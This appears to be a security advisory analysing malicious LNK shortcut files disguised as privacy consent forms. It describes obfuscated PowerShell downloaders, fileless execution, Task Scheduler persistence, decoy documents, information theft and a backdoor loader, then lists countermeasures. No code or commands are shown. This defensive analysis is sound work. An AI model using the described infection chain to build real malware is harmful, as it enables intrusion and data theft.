What is the true nature of the shortcut file I thought was a privacy consent form?

Evidence has recently emerged that Malicious Files posing as “Consent Forms for the Collection and Use of Personal Information” have been circulating. Threat actors use file names that are easily mistaken for work documents to trick users into running them. These files are not actual documents but shortcut files; when executed, they collect PC information through hidden commands and may lead to further malicious behavior.

In this article, we’ll examine how these malicious LNK files operate and how to respond safely.

In this case, the LNK file contains an obfuscated PowerShell script. When a user runs the file, the script executes and downloads an additional malicious PowerShell script from an external source, executing it using a fileless method. The fileless method performs memory execution of the malicious file without saving it to the PC, making it difficult for users to detect the infection.

[Figure 1] PowerShell script contained within the LNK file

Generation of Additional Scripts and Ensuring Persistence

Evidence has also been found that the threat actor modified the contents of the external scripts multiple times. Although the six types of code identified so far differ from one another, they all follow the same method of decrypting and executing obfuscated PowerShell code.

When the malicious LNK file is executed, additional PowerShell scripts are created in specific paths on the user’s PC. One of these acts as a downloader to retrieve external payloads, while the other serves as a loader to execute the downloader.

[Figure 2] Additional PowerShell script_1

[Figure 3] Additional PowerShell script_2

The threat actor then registers a task in the Windows Task Scheduler to ensure the loader script runs repeatedly. While the Task Scheduler is a legitimate feature designed to automatically run programs at set times or under specific conditions, if exploited by a threat actor, it can cause malicious behavior to resume even after the PC is rebooted.

Additionally, the malicious LNK file creates and executes a decoy file—a legitimate-looking document—embedded within it to avoid arousing the user’s suspicion. Since the document appears to open normally, it is difficult for the user to detect the infection. The original LNK file is then deleted, leaving no trace.

[Figure 4] Legitimate decoy document

Additional malicious files identified in the download path

Two main types of additional malicious files were identified in the confirmed download path. One is a PowerShell script that performs Information Theft on the infected PC, and the other is a PowerShell script that acts as a backdoor loader.

The downloader-type script operates by downloading data stored on a legitimate web service, extracting the encoded data contained within it, and executing it. Since this data can be modified by the threat actor, the malware executed can vary even within the same malware distribution method.

The Information Theft script follows a pattern similar to past cases involving the Kimsuky group, and in this instance as well, evidence was found that the threat actor utilized an external service.

Information Theft and Backdoor Behavior

Information Theft PowerShell scripts collect various types of information from infected PCs. The data collected includes information on installed security products, the operating system, network settings, IP addresses, drive information, recently modified files, and running processes.
This information can be used by the threat actor to assess the environment of the infected PC. For example, it can be used to determine whether security software is installed, the status of network connections, and the potential for further attacks.

[Figure 5] Information Theft PowerShell script

Backdoor loader-type scripts decrypt the embedded executable data and load it into memory. The loaded malware then functions as a backdoor and can perform malicious activities such as Information Theft or executing DLLs (Dynamic Link Libraries).

A backdoor is malware that allows an attacker to regain access to an infected PC or issue additional commands. Therefore, caution is required because such attacks do not end with simple information gathering but can lead to follow-up attacks.

[Figure 6] Backdoor Malware

Countermeasures

This attack begins when a user executes an LNK file, mistaking it for a document. Therefore, verification procedures before executing files are crucial. In corporate environments, organizations should conduct comprehensive checks not only on files from suspicious sources but also on Task Scheduler activities, PowerShell execution logs, and external access logs.

1) Avoid executing files from unknown sources

Even if a file appears to be a document, if its file extension is ‘.LNK,’ it may actually be a shortcut file rather than a document file, so users should exercise caution before executing it.

2) Verify the file extension and delivery Path before executing a file

For files received through email, instant messaging, or websites, you must first verify the sender and the delivery path. Files with subject lines that seem familiar in a work context are particularly susceptible to being exploited by threat actors.

3) Check the Task Scheduler and Suspicious Files

Corporate security administrators should check whether any suspicious Task Scheduler entries have been registered on the organization’s PCs. They should also verify whether any abnormal PowerShell scripts or unknown files have been created in user account paths.

4) Verify PowerShell Execution and External Access Logs

You must check PowerShell execution logs, traces of external connections, and whether any scripts are running repeatedly. Even connections that appear to be legitimate web services or cloud storage can be exploited to deliver malicious data, so you must check for any connection patterns that differ from the norm.